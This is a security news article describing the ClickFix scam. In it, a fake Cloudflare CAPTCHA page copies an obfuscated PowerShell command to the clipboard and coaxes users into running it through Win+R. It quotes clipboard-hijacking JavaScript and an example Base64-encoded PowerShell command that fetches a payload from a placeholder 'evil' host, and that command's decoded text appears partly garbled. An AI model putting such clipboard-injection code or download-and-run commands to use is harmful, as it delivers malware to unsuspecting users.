ClickFix Scam Masquerades as Cloudflare Check to Slip Malware

A new social engineering scam, nicknamed ClickFix, is making waves in the cybersecurity world by exploiting user trust in routine security checks.

Disguised as a Cloudflare CAPTCHA known as the “Turnstile” interface the attack lures unsuspecting victims into executing malware on their own systems through a technical sleight of hand that is deceptively simple, yet alarmingly effective.

Fake Verification, Real Threat

Unlike classic phishing attacks, which rely on malicious downloads or phishing forms, ClickFix leverages clipboard hijacking and user-aided code execution. Here’s how the technical workflow unfolds:

1. Imitation Game: The attacker hosts a page that is a near-perfect replica of Cloudflare’s Turnstile CAPTCHA. This includes legitimate-looking branding, dynamically generated “Ray ID” numbers, and the correct domain references to avoid suspicion.
2. Social Engineering via Familiar Prompts: Once a user lands on this page either via a compromised website, a typo-squatted domain, or a malicious link they are greeted with a message like:”Checking if the site connection is secure Verify you are human.”After ticking the familiar “I’m not a robot” checkbox, a new set of instructions appears, guiding the user through “verification steps.” These usually say:
   • Press ⊞ Win+R (opening the Windows Run dialogue)
   • Press Ctrl+V (to paste clipboard contents)
   • Press Enter (to run the pasted command)
3. Clipboard Manipulation: At this point, a hidden JavaScript function on the page silently copies an obfuscated, Base64-encoded PowerShell command into the user’s clipboard. This critical step is performed using the modern Clipboard API, such as:javascriptnavigator.clipboard.writeText('powershell -encodedcommand ...'); The copied command typically fetches and executes a second-stage malware payload from a remote server.
4. Unwitting Execution: When the user follows the instructions, their own keystrokes paste and execute the malicious command via Windows’ built-in tools like PowerShell or MSHTA. Because the user initiates this process, browser security mechanisms and endpoint protections (which might block downloads or flag unknown executables) are sidestepped.

The Malicious HTML Page

The ClickFix pages are often distributed as self-contained HTML files with all styles, images, and scripts embedded. The phishing code is deeply obfuscated to evade analysis and detection. Here’s a simplified breakdown:

• Domain Spoofing: The HTML template dynamically displays the targeted website’s domain and a unique “Ray ID” string for authenticity.
• Obfuscated Payloads: The PowerShell command is hidden (often Base64-encoded) to avoid simple pattern detection.
• Clipboard API Abuse: The script forcibly overwrites whatever is in the user’s clipboard as soon as they interact with the page:javascriptdocument.querySelector('#checkbox').addEventListener('click', function() { navigator.clipboard.writeText(atob('UABvAHcAZQByAFMAaABlAGwAbAAg...')); });
• No External Resources: The page loads no third-party assets, making it easy for attackers to serve from compromised domains or typo-squatted lookalikes.
• No Obvious Red Flags: There’s no file to download and no suspicious browser warnings, further lowering the guard of users.

Human Factors Meet Technical Subtlety

Despite its low-tech approach, ClickFix remains effective due to a blend of technical concealment and psychological manipulation:

• Verification Fatigue: Modern users are conditioned to click through CAPTCHAs and security checks without skepticism, especially when presented with familiar branding.
• Trust in Appearance: The replicas are pixel-perfect; users are unlikely to double-check the domain when faced with a recognizable interface and HTTPS padlock.
• URL Deception: Attackers may use domains nearly identical to real services (e.g., notionbox.org vs. notion.com) or even inject the code into legitimate, compromised websites.
• Invisible Execution: By using clipboard and built-in system utilities instead of suspicious EXE downloads, attackers bypass many layers of endpoint security.

Typical Payload Example

A common obfuscated PowerShell payload might look like:

powershellpowershell -encodedCommand "JAB3AGUAYgBjAGwAaQBlAG4AdAAgAD0AIgBoAHQAdABwADoALwAvAGUAdgBpAGwALgBlAHgAZQAiADsAIgBwAG8AdwBlAHIAcABvAHMAdABqAG8AagBvAG4AUgBlAG0AbwB0AGUALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUgBlAHIAbwBLAGkAZAAoACkAIg=="

Decoded, this command typically downloads and executes a malicious payload, such as Lumma Stealer, Stealc, or RATs like NetSupport Manager.